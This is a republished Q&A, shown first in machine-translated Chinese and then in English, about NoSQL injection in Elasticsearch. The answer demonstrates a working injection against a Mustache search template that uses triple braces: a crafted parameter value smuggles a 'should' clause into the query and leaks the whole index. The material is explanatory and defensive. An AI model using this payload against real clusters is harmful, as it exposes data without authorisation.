使用Elasticsearch防止NoSQL注入 [英] Preventing NoSQL injections with Elasticsearch
问题描述
我正在后端使用 QueryBuilders 构建Elasticsearch查询。群集不直接暴露于Internet,只能通过后端访问。
我注意到我为它提供了不偏不倚的用户输入,这让我想起了SQL注入。我知道如何防止SQL注入,但是我不确定 QueryBuilder 是否转义输入?
I发现有一个叫做搜索模板的东西,它使用胡须。他们是否可以正确地转义内容?他们是防止此类问题的走之路吗?
我什至不确定有问题的用户输入会是什么样。使用 QueryBuilder 时,我认为查询的 HTTP方法不能更改。
也许脚本编写可能是一个问题,但是可以将其禁用。
重申我的问题:代码注入是否是一个问题Elasticsearch,如果可以,减轻它们的最佳方法是什么?
谢谢! :)
您可以找到所有以前在ES中检测到安全漏洞,但是到目前为止,NoSQL注入从来都不是其中的一个...。
但是,您可以找到一些文献,其中谈到了如何做那。另外一些其他讨论和资源可能值得阅读。
作为一个简单的例子,使用使用Mustache模板语言的搜索模板时,绝对有可能制造NoSQL注入攻击。例如,假设我们有以下两个文档: PUT Attack / doc / 1
{
field1:2,
field2:1
}
PUT攻击/ doc / 2
{
field1:2,
field2:2
}
在 field1上进行模板查询(错误地)使用三个胡须:
POST脚本/攻击
{
script:{
lang:小胡子,
source:
{
query:{
bool :{
filter:[
{
term:{
field1:{{{field}}}
}
},
{
range:{
field2:{
gte:2
}
}
}
]
}
}
}
}
}
通过为字段参数使用一个巧妙选择的值,我们可以泄漏整个索引: / p>
POST攻击/ _search / template
{
id: attack,
params:{
field: 2}}],\应该\:[{\ range\:{\ field2\:{\ lte\:2}
}
}
最终查询看起来像这样,即我们能够插入应该泄漏整个索引的应该子句:
{
query:{
bool:{
filter:[
{
term:{
field1:2
}
}
],
应该:[
{
range:{
field2:{
lte :2
}
}
},
{
range:{
field2:{
gte: 2
}
}
}
]
}
}
}
I'm building an Elasticsearch query using QueryBuilders in my backend. The cluster is not directly exposed to the internet, and only accessed through the backend.
I've noticed that I am providing it with un-santized user input, and it reminded me of SQL injections. I know how to prevent SQL injections, but I'm not sure that the QueryBuilder escapes the input?
I found that there is a thing called 'Search Templates', which use mustache. Do they maybe escape the content properly? Are they 'the way to go' to prevent such problems?
I'm not even sure what the problematic user input could be like. When using the QueryBuilder, I don't think the HTTP METHOD of the query could be changed.
Maybe scripting could be a problem, but that can be disabled.
To reiterate my question: are code injections a problem for Elasticsearch, and if yes, what are the best ways to mitigate them?
Thanks! :)
You can find all previously detected security flaws in ES, but NoSQL injection has never been one of them... so far.
However, you can find some literature that talks about how to do just that. Also some other discussions and resources might be worth reading.
As a quick example, it is definitely possible to create a NoSQL injection attack when using search templates that are leveraging the Mustache templating language. For instance, say we have the following two documents:
PUT attack/doc/1
{
"field1": 2,
"field2": 1
}
PUT attack/doc/2
{
"field1": 2,
"field2": 2
}
And a template query on field1 that (wrongly) uses triple mustaches:
POST _scripts/attack
{
"script": {
"lang": "mustache",
"source": """
{
"query": {
"bool": {
"filter": [
{
"term": {
"field1": {{{field}}}
}
},
{
"range": {
"field2": {
"gte": 2
}
}
}
]
}
}
}
"""
}
}
By using a cleverly chosen value for the field parameter, we can leak the whole index:
POST attack/_search/template
{
"id": "attack",
"params": {
"field": "2}}],\"should\":[{\"range\":{\"field2\":{\"lte\":2}"
}
}
The final query would look like this, i.e. we were able to insert a should clause that basically leaks the whole index:
{
"query" : {
"bool" : {
"filter" : [
{
"term" : {
"field1" : 2
}
}
],
"should" : [
{
"range" : {
"field2" : {
"lte" : 2
}
}
},
{
"range" : {
"field2" : {
"gte" : 2
}
}
}
]
}
}
}
这篇关于使用Elasticsearch防止NoSQL注入的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
